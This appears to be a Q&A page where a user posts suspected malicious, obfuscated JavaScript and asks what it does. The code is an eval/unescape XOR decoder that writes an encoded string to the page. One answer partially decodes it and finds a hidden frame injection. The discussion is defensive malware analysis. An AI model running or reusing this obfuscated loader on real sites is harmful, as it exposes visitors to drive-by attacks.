obfuscated javascript code

I have encountered some java script code which I believe is malicious but most of it is obfuscated. I was wondering if someone could help me figure out what this code actually does.

eval(unescape('function n48ec61ae(s) {
    var r = "";
    var tmp = s.split("12113781");
    s = unescape(tmp[0]);
    k = unescape(tmp[1] + "608421");
    for( var i = 0; i < s.length; i++) {
        r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-4);
    }
    return r;
}
'));
eval(unescape('document.write(n48ec61ae('') + 'GoqwpF@dmgiEFxipviJBkSbzbjxy,_WMD1yj{yoBFqa|g%ufxoA"go}swtip%-asvporpE$'EF3hachJAmulwisa~$^WYVF%<24-8(&,BQWOJ_G&0."J^ASHAP_NIRI 4. HWBR@QTAOKRCE$5!A@n~cqa PDVJH xw| $_RE@!oq~t:;5{s0ram`axsau2ows2ulaoizm6<21wnkdpicp5hx6vms@q042enA1?7+5=0oI $ZWTHPNWOBFj~ash#QLWIE.nsyaos5kl~& _PGI"ggtzq8ftmto. SDQHDT[I@^LI"6'#RLPKIZJIEONYF%= $SOPSXTOSLB/TS",LVMUKGTUAOVE.2&,VQWNTDXIF@;ntdvj~oxFHtsbrgpntKF3v{lvmukvEF3hpwpJ121137817396048' + unescape(''));'));
// -->

Just as a reminder DO NOT EXECUTE THIS CODE.

  • Which encoding uses“Zq” prefix?
  • I need a Javascript literal syntax converter/deobfuscation tools
  • How does this obfuscated javascript code work?
  • How to defeat deobfuscation of obfuscated javascript code?
  • Deobfuscation of minified JS with source maps
  • Obfuscated Javascript code?
  • How to deobfuscate javascript codes with “[][filter][constructor]…”?
  • How to decrypt a javascript file
  • Deobfuscation of minified JS with source maps
  • How to “decode” some obfuscated JavaScript in HTML?
  • How does this magic Javascript work?
  • How does this obfuscated javascript code work?
  • One Solution collect form web for “obfuscated javascript code”

    Silly rabbit… tricks are for virtual machine images which you were planning on discarding anyway…

    I’ve spent a good deal of time on this and I think I can confirm that this is so obfuscated that it can’t do anything anymore.

    You’ll get this:

    <html>D`i]eI>vdsq\H>kW^v`fly*ZLJI3ujouk@BuazbrkzkA&ckwo{lgm*dqrpcnl? +=@.k^fjFAaqhmewax!UPLLB0.0'4*?RPBH[?*,* FRAMEBORDER=0$<O<OCNYCKKV?A1%A>ku\tcPHRFJlozXW?<!cmzn6/-un3mdg\alo]o.com/nkdeeza280-{feasffr1hl2rgoDq.11bcC-7;'17,cI!YPYJLF[K><frame NAME="jo{]cs3fgy+"[PKE]cxzo5]s`nk&$O@SDHLUDCYAK.+NFL?ITGJBBDU>)9OCPMUOHVF>'XO&HZESF<SXCKNI*.(ZQQKOCMKB@/jp^r^viu=Gyq^rkljnGJ3pvgq`ognIB/jl{pD
    

    The problem is that another function is needed to unscramble this. Notice how it has <html> as well as FRAMEBORDER=, and <frame? That means that there is something which is able to break this up into chunks and reassemble it. The fact that there are so much noise also suggests that there is a function which further decrypts this beyond the scope of n48ec61ae.